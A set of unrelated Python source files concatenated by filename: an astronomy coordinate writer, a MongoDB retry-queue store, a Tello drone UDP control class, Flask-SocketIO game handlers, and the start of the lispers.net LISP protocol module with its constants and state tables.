    # simply socket.getfqdn does not actually do that on ARTS
    fqdn = socket.getaddrinfo(socket.gethostname(), None, 0, socket.SOCK_DGRAM, 0, socket.AI_CANONNAME)[0][3]
    info['web_link'] = 'http://{fqdn}/~{user}/darc/{webdir}/' \
                       '{date}/{datetimesource}'.format(fqdn=fqdn, user=os.getlogin(),
                                                        webdir=self.webdir, **self.obs_config)
    # save the file
    with open(fname, 'w') as f:
        yaml.dump(info, f, default_flow_style=False)
    # generate file with coordinates
    coordinates = {}
    for beam in self.obs_config['beams']:
        try:
            # phaseCenter is parsed from a parset string like "[1.0deg, 2.0deg]"
            # NOTE(review): assumes literal_eval yields exactly two values -- confirm parset format
            key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
            c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
            if parset['task.directionReferenceFrame'] == 'HADEC':
                # convert HADEC to J2000 RADEC at midpoint of observation
                midpoint = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
                pointing = SkyCoord(*util.hadec_to_radec(c1 * u.deg, c2 * u.deg, midpoint))
            else:
                pointing = SkyCoord(c1, c2, unit=(u.deg, u.deg))
        except Exception as e:
            # keep going on a bad beam; placeholder coordinates mark the failure
            self.logger.error("Failed to get pointing for CB{:02d}: {}".format(beam, e))
            coordinates[beam] = ['-1', '-1', '-1', '-1']
        else:
            # get pretty strings
            ra = pointing.ra.to_string(unit=u.hourangle, sep=':', pad=True, precision=1)
            dec = pointing.dec.to_string(unit=u.deg, sep=':', pad=True, precision=1)
            gl, gb = pointing.galactic.to_string(precision=8).split(' ')
            coordinates[beam] = [ra, dec, gl, gb]
    # save to result dir
    with open(os.path.join(self.central_result_dir, 'coordinates.txt'), 'w') as f:
        f.write("#CB RA Dec Gl Gb\n")
        for beam, coord in coordinates.items():
            f.write("{:02d} {} {} {} {}\n".format(beam, *coord))
    return info, coordinates
|
mongo.py | # from typing import List
from datetime import datetime
from queue import Queue
import pymongo, threading
class Mongo(object):
    """Store messages in a MongoDB collection.

    Messages that cannot be stored (no connection, or an unacknowledged
    write) are buffered in a queue; run() drains that buffer and retries.
    """

    def __init__(self, mongoConfig: dict, queue: Queue):
        """
        :param mongoConfig: dict with HOST, PORT, USER, PASS, DATABASE,
            COLLECTION and TIMEOUT keys
        :param queue: buffer for messages that could not be stored yet
        """
        self.__set_vars(mongoConfig)
        self.queue: Queue = queue
        # All three stay None until connect() succeeds
        self.client = None      # pymongo.MongoClient
        self.database = None    # pymongo.database.Database
        self.collection = None  # pymongo.collection.Collection

    def __set_vars(self, config: dict):
        """Copy connection settings from *config* onto the instance."""
        self.MONGO_HOST = config["HOST"]
        self.MONGO_PORT = config["PORT"]
        # empty/falsy user or password means "no authentication"
        self.MONGO_USER = config["USER"] if config["USER"] else None
        self.MONGO_PASS = config["PASS"] if config["PASS"] else None
        self.MONGO_DB = config["DATABASE"]
        self.MONGO_COLLECTION = config["COLLECTION"]
        self.MONGO_TIMEOUT = config["TIMEOUT"]
        self.MONGO_DATETIME_FORMAT = "%d/%m/%Y %H:%M:%S"

    def connect(self):
        """Open the client and resolve database/collection handles."""
        print("Connecting Mongo")
        self.client = pymongo.MongoClient(
            host=self.MONGO_HOST,
            port=self.MONGO_PORT,
            username=self.MONGO_USER,
            password=self.MONGO_PASS
        )
        self.database = self.client.get_database(self.MONGO_DB)
        self.collection = self.database.get_collection(self.MONGO_COLLECTION)
        # ping the server so connectivity problems surface here, not on first save
        self.connected()

    def disconnect(self):
        """Close the client, if any, and drop the reference."""
        print("Disconnecting Mongo")
        if self.client:
            self.client.close()
            self.client = None

    def connected(self) -> bool:
        """Return True when the server answers an 'ismaster' ping."""
        if not self.client:
            return False
        try:
            self.client.admin.command("ismaster")
        except pymongo.errors.PyMongoError:
            return False
        else:
            return True

    def __enqueue(self, msg: dict):
        """Buffer *msg* for a later retry."""
        print("Enqueuing")
        self.queue.put(msg)

    def __sync_queue(self):
        """Wait briefly for one buffered message and retry saving it.

        Fix: a blocking get with timeout replaces the original
        ``if self.queue.qsize(): self.save(self.queue.get())`` poll, which
        busy-waited at 100% CPU while the queue was empty and raced between
        the qsize() check and the get().
        NOTE(review): when the DB is down and messages are pending, save()
        re-enqueues immediately, so run() still cycles quickly in that state.
        """
        from queue import Empty  # local import keeps the module import line unchanged
        try:
            msg = self.queue.get(timeout=1.0)
        except Empty:
            return
        self.save(msg)

    def __store_thread_f(self, msg: dict):
        """Insert *msg*; re-enqueue it when the write is not acknowledged."""
        print("Storing")
        try:
            result = self.collection.insert_one(msg)
            print("Saved in Mongo document ID", result.inserted_id)
            if not result.acknowledged:
                # Enqueue message if it was not saved properly
                self.__enqueue(msg)
        except Exception as ex:
            # best-effort: log and drop; raising here would kill the daemon thread
            print(ex)

    def __store(self, msg: dict):
        """Insert *msg* on a daemon thread so save() never blocks the caller."""
        th = threading.Thread(target=self.__store_thread_f, args=(msg,))
        th.daemon = True
        th.start()

    def save(self, msg: dict):
        """Store *msg* now when connected, otherwise buffer it for run()."""
        print("Saving")
        if self.connected():
            self.__store(msg)
        else:
            self.__enqueue(msg)

    def run(self):
        """Forever drain the retry buffer; swallows and logs all errors."""
        while True:
            try:
                self.__sync_queue()
            except Exception as err:
                print(f"ERROR: {err}")
|
tello.py | import socket
import threading
import time
import numpy as np
import libh264decoder
class Tello:
    """Wrapper class to interact with the Tello drone.

    Sends text commands over UDP and receives command acknowledgements and a
    raw h264 video stream on background daemon threads.

    NOTE(review): this class uses Python-2-era idioms (str/bytes mixing in the
    video thread, integer ``/`` division, py2 ``filter`` returning a string) --
    it presumably targets Python 2 together with the libh264decoder binding;
    confirm before running under Python 3.
    """

    def __init__(self, local_ip, local_port, imperial=False, command_timeout=.3, tello_ip='192.168.10.1',
                 tello_port=8889):
        """
        Binds to the local IP/port and puts the Tello into command mode.

        :param local_ip (str): Local IP address to bind.
        :param local_port (int): Local port to bind.
        :param imperial (bool): If True, speed is MPH and distance is feet.
                         If False, speed is KPH and distance is meters.
        :param command_timeout (int|float): Number of seconds to wait for a response to a command.
        :param tello_ip (str): Tello IP.
        :param tello_port (int): Tello port.
        """
        self.for_debug = False            # when True, send_command logs each command
        self.video_only_flag = True       # hard-coded True: command socket is always set up
        self.abort_flag = False           # set by the command-timeout timer
        self.decoder = libh264decoder.H264Decoder()
        self.command_timeout = command_timeout
        self.imperial = imperial
        self.response = None              # last raw ack bytes from the drone
        self.frame = None  # numpy array BGR -- current camera output frame
        self.is_freeze = False  # freeze current camera output
        self.last_frame = None
        self.last_height = 0              # fallback when 'height?' returns garbage
        self.local_video_port = 11111  # port for receiving video stream
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # socket for sending cmd
        self.socket_video = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # socket for receiving video stream
        self.tello_address = (tello_ip, tello_port)
        if self.video_only_flag:
            # NOTE(review): grouping reconstructed from flattened indentation;
            # since video_only_flag is hard-coded True this does not change behavior
            self.socket.bind((local_ip, local_port))
            # thread for receiving cmd ack
            self.receive_thread = threading.Thread(target=self._receive_thread)
            self.receive_thread.daemon = True
            self.receive_thread.start()
        # to receive video -- send cmd: command, streamon
        #self.socket.sendto(b'command', self.tello_address)
        #print ('sent: command')
        #self.socket.sendto(b'streamon', self.tello_address)
        #print ('sent: streamon')
        self.socket_video.bind((local_ip, self.local_video_port))
        # thread for receiving video
        self.receive_video_thread = threading.Thread(target=self._receive_video_thread)
        self.receive_video_thread.daemon = True
        self.receive_video_thread.start()

    def __del__(self):
        """Closes the local socket."""
        self.socket.close()
        self.socket_video.close()

    def read(self):
        """Return the last frame from camera."""
        if self.is_freeze:
            return self.last_frame
        else:
            return self.frame

    def video_freeze(self, is_freeze=True):
        """Pause video output -- set is_freeze to True"""
        self.is_freeze = is_freeze
        if is_freeze:
            # snapshot the current frame so read() keeps returning it
            self.last_frame = self.frame

    def _receive_thread(self):
        """Listen to responses from the Tello.

        Runs as a thread, sets self.response to whatever the Tello last returned.
        """
        while True:
            try:
                # NOTE(review): self.response is read by send_command without a
                # lock -- relies on CPython attribute assignment being atomic
                self.response, ip = self.socket.recvfrom(3000)
                #print(self.response)
            except socket.error as exc:
                print ("Caught exception socket.error : %s" % exc)

    def _receive_video_thread(self):
        """
        Listens for video streaming (raw h264) from the Tello.

        Runs as a thread, sets self.frame to the most recent frame Tello captured.
        """
        # accumulates packets until a frame boundary (Python 2: str == bytes)
        packet_data = ""
        while True:
            try:
                res_string, ip = self.socket_video.recvfrom(2048)
                packet_data += res_string
                # end of frame: a full video packet carries 1460 payload bytes,
                # so a shorter packet marks the last chunk of a frame
                if len(res_string) != 1460:
                    for frame in self._h264_decode(packet_data):
                        self.frame = frame
                    packet_data = ""
            except socket.error as exc:
                print ("Caught exception socket.error : %s" % exc)

    def _h264_decode(self, packet_data):
        """
        decode raw h264 format data from Tello

        :param packet_data: raw h264 data array
        :return: a list of decoded frame
        """
        res_frame_list = []
        frames = self.decoder.decode(packet_data)
        for framedata in frames:
            (frame, w, h, ls) = framedata
            if frame is not None:
                # print 'frame size %i bytes, w %i, h %i, linesize %i' % (len(frame), w, h, ls)
                # NOTE(review): np.fromstring is deprecated (frombuffer in
                # modern numpy); `ls / 3` is integer division under Python 2
                frame = np.fromstring(frame, dtype=np.ubyte, count=len(frame), sep='')
                # reshape to (height, linesize/3, 3) then trim padding columns to width
                frame = (frame.reshape((h, ls / 3, 3)))
                frame = frame[:, :w, :]
                res_frame_list.append(frame)
        return res_frame_list

    def send_command(self, command):
        """
        Send a command to the Tello and wait for a response.

        Busy-waits until either the receive thread fills self.response or the
        command_timeout timer sets abort_flag.

        :param command: Command to send.
        :return (str): Response from Tello, or 'none_response' on timeout.
        """
        if self.for_debug:
            print (">> send cmd: {}".format(command))
        self.abort_flag = False
        timer = threading.Timer(self.command_timeout, self.set_abort_flag)
        self.socket.sendto(command.encode('utf-8'), self.tello_address)
        timer.start()
        while self.response is None:
            if self.abort_flag is True:
                break
        timer.cancel()
        if self.response is None:
            response = 'none_response'
        else:
            response = self.response.decode('utf-8')
        # reset so the next command does not see a stale ack
        self.response = None
        return response

    def set_abort_flag(self):
        """
        Sets self.abort_flag to True.

        Used by the timer in Tello.send_command() to indicate to that a response

        timeout has occurred.
        """
        self.abort_flag = True

    def takeoff(self):
        """
        Initiates take-off.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.send_command('takeoff')

    def set_speed(self, speed):
        """
        Sets speed.

        This method expects KPH or MPH. The Tello API expects speeds from
        1 to 100 centimeters/second.

        Metric: .1 to 3.6 KPH
        Imperial: .1 to 2.2 MPH

        Args:
            speed (int|float): Speed.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        speed = float(speed)
        if self.imperial is True:
            speed = int(round(speed * 44.704))    # MPH -> cm/s
        else:
            speed = int(round(speed * 27.7778))   # KPH -> cm/s
        return self.send_command('speed %s' % speed)

    def rotate_cw(self, degrees):
        """
        Rotates clockwise.

        Args:
            degrees (int): Degrees to rotate, 1 to 360.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.send_command('cw %s' % degrees)

    def rotate_ccw(self, degrees):
        """
        Rotates counter-clockwise.

        Args:
            degrees (int): Degrees to rotate, 1 to 360.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.send_command('ccw %s' % degrees)

    def flip(self, direction):
        """
        Flips.

        Args:
            direction (str): Direction to flip, 'l', 'r', 'f', 'b'.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.send_command('flip %s' % direction)

    def get_response(self):
        """
        Returns response of tello.

        Returns:
            int: response of tello.
        """
        response = self.response
        return response

    def get_height(self):
        """Returns height(dm) of tello.

        Returns:
            int: Height(dm) of tello.
        """
        height = self.send_command('height?')
        height = str(height)
        # NOTE(review): Python 2 semantics -- filter on a str returns a str of
        # the digit characters; under Python 3 this would return an iterator
        height = filter(str.isdigit, height)
        try:
            height = int(height)
            self.last_height = height
        except:
            # fall back to the last good reading on a malformed reply
            height = self.last_height
            pass
        return height

    def get_battery(self):
        """Returns percent battery life remaining.

        Returns:
            int: Percent battery life remaining.
        """
        battery = self.send_command('battery?')
        try:
            battery = int(battery)
        except:
            # on a malformed reply the raw response string is returned as-is
            pass
        return battery

    def get_flight_time(self):
        """Returns the number of seconds elapsed during flight.

        Returns:
            int: Seconds elapsed during flight.
        """
        flight_time = self.send_command('time?')
        try:
            flight_time = int(flight_time)
        except:
            # on a malformed reply the raw response string is returned as-is
            pass
        return flight_time

    def get_speed(self):
        """Returns the current speed.

        Returns:
            int: Current speed in KPH or MPH.
        """
        speed = self.send_command('speed?')
        try:
            speed = float(speed)
            if self.imperial is True:
                speed = round((speed / 44.704), 1)    # cm/s -> MPH
            else:
                speed = round((speed / 27.7778), 1)   # cm/s -> KPH
        except:
            # on a malformed reply the raw response string is returned as-is
            pass
        return speed

    def land(self):
        """Initiates landing.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.send_command('land')

    def move(self, direction, distance):
        """Moves in a direction for a distance.

        This method expects meters or feet. The Tello API expects distances
        from 20 to 500 centimeters.

        Metric: .02 to 5 meters
        Imperial: .7 to 16.4 feet

        Args:
            direction (str): Direction to move, 'forward', 'back', 'right' or 'left'.
            distance (int|float): Distance to move.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        distance = float(distance)
        if self.imperial is True:
            distance = int(round(distance * 30.48))   # feet -> cm
        else:
            distance = int(round(distance * 100))     # meters -> cm
        return self.send_command('%s %s' % (direction, distance))

    def move_backward(self, distance):
        """Moves backward for a distance.

        See comments for Tello.move().

        Args:
            distance (int): Distance to move.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.move('back', distance)

    def move_down(self, distance):
        """Moves down for a distance.

        See comments for Tello.move().

        Args:
            distance (int): Distance to move.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.move('down', distance)

    def move_forward(self, distance):
        """Moves forward for a distance.

        See comments for Tello.move().

        Args:
            distance (int): Distance to move.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.move('forward', distance)

    def move_left(self, distance):
        """Moves left for a distance.

        See comments for Tello.move().

        Args:
            distance (int): Distance to move.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.move('left', distance)

    def move_right(self, distance):
        """Moves right for a distance.

        See comments for Tello.move().

        Args:
            distance (int): Distance to move.
        """
        return self.move('right', distance)

    def move_up(self, distance):
        """Moves up for a distance.

        See comments for Tello.move().

        Args:
            distance (int): Distance to move.

        Returns:
            str: Response from Tello, 'OK' or 'FALSE'.
        """
        return self.move('up', distance)
|
socketio_handlers.py | """Flask-SocketIO handlers and utility functions"""
import random, time, subprocess
from flask import request
from flask_socketio import send, emit#, join_room, leave_room
from dominos.Engine import Engine
from dominos import socketio
"""Settings"""
parsed_args = {}
keep_client_order = True
class RoomTracker:
    """Tracks game rooms and maps SocketIO session ids to their room."""

    def __init__(self):
        # room id -> {"clients": {id: {...}}, "observers": {...}, "started": bool}
        self.game_rooms = {}
        # request.sid -> room id
        self.sids_to_rooms = {}
# Single shared tracker; room 1 is pre-created since this build is single-room
rt = RoomTracker()
rt.game_rooms[1] = {"clients": {}, "observers": {}, "started": False}
"""Run Flask-SocketIO, potentially changing settings"""
def run_socketio(app, host, keep_order=None, cmd_args=None):
    """Start the Flask-SocketIO server for *app* on *host*.

    keep_order and cmd_args are accepted for call-site compatibility but are
    currently unused: the settings-override logic is disabled.
    """
    socketio.run(app, host=host)
"""Utility Functions"""
# def get_id_from_sid(sid):
# room = rt.sids_to_rooms[sid]
# for c in rt.game_rooms[room]["clients"]:
# if rt.game_rooms[room]["clients"][c]["sid"] == sid:
# return c
# raise ValueError("Invalid sid request")
# def broadcast_to_room(room):
# def broadcast(msg, tag=None):
# """Send a message to all clients."""
# clear_old_info(room)
# if tag is None:
# socketio.send(msg, room=room)
# else:
# for client in rt.game_rooms[room]["clients"]:
# emit_to_client_in_room(room)(msg, client, tag, clear=False)
# return broadcast
# def emit_to_client_in_room(room):
# def emit_to_client(msg, client_id, tag=None, clear=True):
# # Clear response before whispering, to ensure we don't keep a stale one
# if clear:
# rt.game_rooms[room]["clients"][client_id]["response"] = "No response"
# if tag is None:
# socketio.send(msg, room=rt.game_rooms[room]["clients"][client_id]["sid"])
# else:
# emit(tag, msg, room=rt.game_rooms[room]["clients"][client_id]["sid"])
# return emit_to_client
# def retrieve_response_in_room(room):
# def retrieve_response(client_id):
# """Get the current stored response corresponding to the requested client."""
# return rt.game_rooms[room]["clients"][client_id]["response"]
# return retrieve_response
# def clear_old_info(room, specific_client=None):
# # Erase outdated info
# for client in ([specific_client] if specific_client is not None else rt.game_rooms[room]["clients"]):
# emit_to_client_in_room(room)("", client, "error")
# emit_to_client_in_room(room)("", client, "prompt")
"""SocketIO Handlers"""
# @socketio.on('join_room')
# def on_join(room):
# if room not in rt.game_rooms:
# rt.game_rooms[room] = {"clients": {}, "observers": {}, "started": False}
# join_room(room)
# new_index = max(rt.game_rooms[room]["clients"].keys()) + 1 if len(rt.game_rooms[room]["clients"]) > 0 else 0
# rt.game_rooms[room]["clients"][new_index] = {"sid": request.sid, "response": "No response", "ai": False}
# rt.sids_to_rooms[request.sid] = room
# send("A new player has joined room {}!".format(room), room=room)
# @socketio.on('leave_room')
# def on_leave(room):
# leave_room(room)
# send("A player has left room {}!".format(room), room=room)
# @socketio.on('connect')
# def on_connect():
# # new_index = max(clients.keys()) + 1 if len(clients) > 0 else 0
# # clients[new_index] = {"sid": request.sid, "response": "No response", "ai": False}
# print("Client connected")
# # print(clients)
# @socketio.on('ai_connect')
# def mark_as_ai():
# room = rt.sids_to_rooms[request.sid]
# for c in rt.game_rooms[room]["clients"]:
# if rt.game_rooms[room]["clients"][c]["sid"] == request.sid:
# rt.game_rooms[room]["clients"][c]["ai"] = True
# print("Marked {} as AI".format(c))
# break
# else:
# raise Exception("Didn't mark as AI, probably executed AI connect before joining room was completed")
# @socketio.on('observer_connect')
# def mark_as_observer(room):
# rt.sids_to_rooms[request.sid] = room
# rt.game_rooms[room]["observers"][request.sid] = {}
# @socketio.on('start_observer')
# def start_as_observer(n_agents):
# print(f"Waiting for {n_agents} agents to connect before starting...")
# # Need to check here not for the number of clients, but for the number of AI, so that we give enough time
# # to mark AIs as AI, so that we send them AI-compatible messages. Setting sleep to something low (e.g. 0.0001)
# # and not waiting for us to mark them as AI will result in us treating them like humans,
# # And so the agents never respond since we don't send them the correct messages.
# # Will need to change this a bit if we want to allow human players to mix with Scheduler,
# # Since this assumes all players from Scheduler are AIs
# room = rt.sids_to_rooms[request.sid]
# while len([c for c in rt.game_rooms[room]["clients"] if rt.game_rooms[room]["clients"][c]["ai"]]) < n_agents:
# time.sleep(0.001)
# pass
# on_start(room)
# @socketio.on('disconnect')
# def on_disconnect():
# # try:
# # del game_rooms[room]["clients"][get_id_from_sid(request.sid)]
# print("Client disconnected")
# # except ValueError:
# # del game_rooms[room]["observers"][request.sid]
# # print("Observers disconnected")
@socketio.on('start_game')
def on_start():
    """Start the game in room 1 exactly once and run the engine to completion."""
    room = 1
    state = rt.game_rooms[room]
    if state["started"]:  # don't allow multiple starts
        return
    print("starting")
    state["started"] = True
    broadcast_to_room(room)("", "game_start")
    # Re-key the clients dict; order is randomized unless keep_client_order
    original_keys = list(state["clients"].keys())
    new_order = list(range(len(state["clients"])))
    if not keep_client_order:
        random.shuffle(new_order)
    state["clients"] = {key: state["clients"][original_keys[i]]
                        for i, key in enumerate(new_order)}
    winner = Engine(emit_to_client_in_room(room), broadcast_to_room(room), retrieve_response_in_room(room),
                    n_players=len(state["clients"])).run_game()
    socketio.stop()
@socketio.on('response')
def store_response(message):
    """Record a client's latest response and blank its stale error/prompt."""
    room = 1
    player_id = get_id_from_sid(request.sid)
    print("Got a response from player {}: ".format(player_id) + message)
    clear_old_info(room, player_id)
    rt.game_rooms[room]["clients"][player_id]["response"] = message
#################
#################
#################
#################
#################
def get_id_from_sid(sid):
    """Return the room-1 client id whose stored sid matches, else raise ValueError."""
    room = 1
    clients = rt.game_rooms[room]["clients"]
    for client_id, info in clients.items():
        if info["sid"] == sid:
            return client_id
    raise ValueError("Invalid sid request")
def broadcast_to_room(room):
    """Build a broadcaster bound to *room*."""
    def broadcast(msg, tag=None):
        """Send a message to all clients."""
        clear_old_info(room)
        if tag is None:
            socketio.send(msg, room=room)
            return
        # tagged messages are whispered individually, without re-clearing
        for client in rt.game_rooms[room]["clients"]:
            emit_to_client_in_room(room)(msg, client, tag, clear=False)
    return broadcast
def emit_to_client_in_room(room):
    """Build a whisper function bound to *room*."""
    def emit_to_client(msg, client_id, tag=None, clear=True):
        client = rt.game_rooms[room]["clients"][client_id]
        # Clear response before whispering, to ensure we don't keep a stale one
        if clear:
            client["response"] = "No response"
        if tag is None:
            socketio.send(msg, room=client["sid"])
        else:
            emit(tag, msg, room=client["sid"])
    return emit_to_client
def retrieve_response_in_room(room):
    """Build a response getter bound to *room*."""
    def retrieve_response(client_id):
        """Get the current stored response corresponding to the requested client."""
        clients = rt.game_rooms[room]["clients"]
        return clients[client_id]["response"]
    return retrieve_response
def clear_old_info(room, specific_client=None):
    """Blank the 'error' and 'prompt' output for one client, or all clients."""
    if specific_client is not None:
        targets = [specific_client]
    else:
        targets = rt.game_rooms[room]["clients"]
    whisper = emit_to_client_in_room(room)
    for client in targets:
        whisper("", client, "error")
        whisper("", client, "prompt")
#################
#################
#################
#################
#################
# def whisper(msg, player, tag=None):
# socketio.emit(tag, msg, room=request.sid)
# def shout(msg, tag=None):
# socketio.emit(tag, msg)
@socketio.on('connect')
def test_connect():
    """Register a newly connected client in room 1 under the next free index."""
    print("Client connected")
    clients = rt.game_rooms[1]["clients"]
    new_index = max(clients.keys()) + 1 if clients else 0
    clients[new_index] = {"sid": request.sid, "response": "No response", "ai": False}
    rt.sids_to_rooms[request.sid] = 1
@socketio.on('disconnect')
def test_disconnect():
    """Drop the disconnecting client from room 1."""
    room = 1
    client_id = get_id_from_sid(request.sid)
    del rt.game_rooms[room]["clients"][client_id]
    print('Client disconnected')
# @socketio.on('start game')
# def on_start(passed_room=None):
# if passed_room is not None:
# room = passed_room
# else:
# room = rt.sids_to_rooms[request.sid]
# if not rt.game_rooms[room]["started"]: # Don't allow multiple starts
# print("Starting")
# broadcast_to_room(room)("", "start game")
# rt.game_rooms[room]["started"] = True
# # shuffle clients randomly
# clients_keys = list(rt.game_rooms[room]["clients"].keys())
# random_keys = [i for i in range(len(rt.game_rooms[room]["clients"]))]
# if not keep_client_order:
# random.shuffle(random_keys)
# shuffled_clients = {}
# for i, k in enumerate(random_keys):
# shuffled_clients[k] = rt.game_rooms[room]["clients"][clients_keys[i]]
# rt.game_rooms[room]["clients"] = shuffled_clients
# ai_players = [c for c in rt.game_rooms[room]["clients"] if rt.game_rooms[room]["clients"][c]["ai"]]
# print(rt.game_rooms[room]["clients"])
# engine = Engine(emit_to_client_in_room(room), broadcast_to_room(room), retrieve_response_in_room(room),
# nonlocal_ais=ai_players, n_players=len(rt.game_rooms[room]["clients"]), **parsed_args)
# winner = engine.run_game()
# socketio.stop()
# @socketio.on('action')
# def store_action(message):
# room = rt.sids_to_rooms[request.sid]
# sender_id = get_id_from_sid(request.sid)
# print("Got an action from player {}: ".format(sender_id) + message)
# clear_old_info(room, sender_id)
# rt.game_rooms[room]["clients"][sender_id]["response"] = message
# @socketio.on('add_bot')
# def add_bot(bot_type):
# room = rt.sids_to_rooms[request.sid]
# broadcast_to_room(room)(f"Adding {bot_type} to game", "info")
# def run_agent():
# try:
# subprocess.run(f"python3 ./coup/agents/{bot_type}.py {room}", shell=True, check=False)
# print('done')
# except BaseException:
# assert False
# pass
# # thread = threading.Thread(target=run_agent)
# thread = socketio.start_background_task(target=run_agent)
# # thread.start()
# thread.join()
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
#------------------------------------------------------------------------------
# Module-level flags, caches, and state tables. Values here are the process
# defaults; many are overwritten at startup or by configuration commands.
# The obfuscator's dead "if N - N: ..." filler (conditions always 0, bodies
# never executed) has been removed; every assignment is preserved verbatim.
#------------------------------------------------------------------------------

# Optional cipher selection via environment variables (set == enabled).
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)

# Debug switch for dumping the RLOC-probe list.
lisp_print_rloc_probe_list = False

# Process identity and role flags -- lisp_i_am() fills these in.
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True

# Control-plane tables and caches (all start empty).
lisp_map_notify_queue = {}
lisp_map_servers_list = {}
lisp_ddt_map_requestQ = {}
lisp_db_list = []
lisp_group_mapping_list = {}
lisp_map_resolvers_list = {}
lisp_rtr_list = {}
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}

# Local interface bookkeeping.
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []

# Periodic timers (created lazily elsewhere).
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None

# Registration counter.
lisp_registered_count = 0

# Info-source state, keyed two ways for lookup by address or by nonce.
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}

# LISP-crypto key state, keyed by nonce and by RLOC (encap/decap sides).
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
lisp_data_plane_security = False
lisp_search_decap_keys = True

# Logging granularity switches.
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False

# Ephemeral port used for crypto key exchange (None until allocated).
lisp_crypto_ephem_port = None

# PITR flag.
lisp_pitr = False

# Layer-2 overlay flag.
lisp_l2_overlay = False

# RLOC-probing state.
lisp_rloc_probing = False
lisp_rloc_probe_list = {}

# Map-server behavior: register to all RTRs by default.
lisp_register_all_rtrs = True

# Nonce-echo state.
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}

# NAT-traversal flag.
lisp_nat_traversal = False

# Hardware-programming flag.
lisp_program_hardware = False

# Map-cache checkpointing.
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"

# External data-plane IPC socket state.
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"

# Lock serializing IPC access (None until created).
lisp_ipc_lock = None

# Default instance-IDs.
lisp_default_iid = 0
lisp_default_secondary_iid = 0

# RTR list learned via map-server configuration.
lisp_ms_rtr_list = []

# NAT state records.
lisp_nat_state_info = {}

# Rate-limiting bookkeeping (timestamps of last sends).
lisp_last_map_request_sent = None
lisp_last_icmp_too_big_sent = 0

# Bounded in-memory flow log.
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []

# Policy table.
lisp_policies = {}

# Load-split pings across RLOCs.
lisp_load_split_pings = False

# Hash values used for EID-based load-splitting.
lisp_eid_hashes = []

# IP fragment reassembly queue.
lisp_reassembly_queue = {}

# Pubsub subscription cache.
lisp_pubsub_cache = {}

# LISP-Decent configuration.
lisp_decent_push_configured = False
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None

# General IPC socket (None until opened).
lisp_ipc_socket = None

# Map-server encryption keys.
lisp_ms_encryption_keys = {}

# RTR cache for NAT-traversal trace messages.
lisp_rtr_nat_trace_cache = {}

# Glean-mapping configuration and learned groups.
lisp_glean_mappings = []
lisp_gleaned_groups = {}

# Raw socket for sending ICMP "too big" messages -- created only when
# explicitly enabled via environment variable, since SOCK_RAW needs
# elevated privileges.
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
    lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_ICMP)
    lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)

# When set, the DF-bit is ignored for fragmentation decisions.
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
# LISP protocol constants (RFC 6830/6833 and related drafts). Dead
# obfuscator filler removed; values unchanged.
#------------------------------------------------------------------------------

# Well-known UDP ports.
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
